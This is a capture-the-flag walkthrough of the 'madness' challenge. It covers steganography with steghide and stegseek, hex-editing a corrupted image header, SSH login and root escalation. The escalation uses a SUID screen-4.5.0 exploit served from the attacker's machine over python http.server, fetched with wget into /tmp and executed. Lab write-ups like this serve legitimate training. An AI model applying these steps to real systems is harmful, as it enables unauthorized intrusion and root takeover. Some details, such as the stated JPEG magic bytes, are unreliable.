The madness challenge is an easy challenge containing stegonography and privilege escalation through a Linux system.


  1. stegseek- To bruteforce passphrase in a steg file.
  2. hexedit- To edit hex value in a file

3.steghide — to extract embedded data.


#nmap -sV -sC -v -Pn <ip_address>

And i found port 22 for secure shell(ssh) and port 80 opened.Further enumerating the Apache server on port 80, i found its home page holds the Apache2 ubuntu default page. After going through the page source i found something interesting

Opening the image (thm.jpg) i found its broken thus cannot be displayed on the web.

Then i decided to get the image into my system using command #wget http://<ip_address>/thm.jpg

First thing that i usually do to a file or data is to check what type of file am dealing with,Opposite of what i had expected to be file name of the image (thm.jpg) i found its a data file.

Using #ghex <filename> to check the hex of the image data i found it was a broken .PNG file.

Since the image extension of the (thm.jpg) was a .jpg and its has its magic hex number which is used to identify it…i will make it simple the magic number for a .jpg(JIFF) on the 1st line should look as “ FF D8 E0 00 10 4A 46 49 46 00 01”

Using #hexedit <file name> to change the 1st line of the data to look as the image below.

And the image file is fixed.Displaying the image i found a hidden directory.

Navigating to the directory .

Viewing the page source i found that the secret number range between 0–99.

I made a python script to find the secret number.

After find the image and the response.

Now i got a passphrase for the thm.jpg image to extract the embedded data.

i found the username and we were provided with a hint in the home page of the madness challenge which said something about ‘ROTten’ and i used ( to rotate the username that i found.Now i have a user to use for ssh login but i don’t have the password.To make it short i tried to look if the image file that we were provided in the challenge if it might have embedded data.

Using #stegseek extract -sf <filename> i found the password.

Using the password and username i log in into the ssh.


i looked for suid files in the system using #find / -type f -perm /4000 -exec ls -la {} \; 2>/dev/null

I found an interesting file “/bin/screen-4.5.0” which has a know exploit in the “” download the exploit and load it in the /tmp directory of the victim:

  1. To get the exploit to your machine copy and save it to your machine
  1. To send the exploit to /tmp directory of the victim machine use

on your machine (attacker) make a server using #python3 -m http.server 8000

# wget http://<your_ip(tun0)>:8000/filename

then execute the file to get root.

follower twitter @ronexondimu

cyber security Enthusiast|| pentester ||ctf player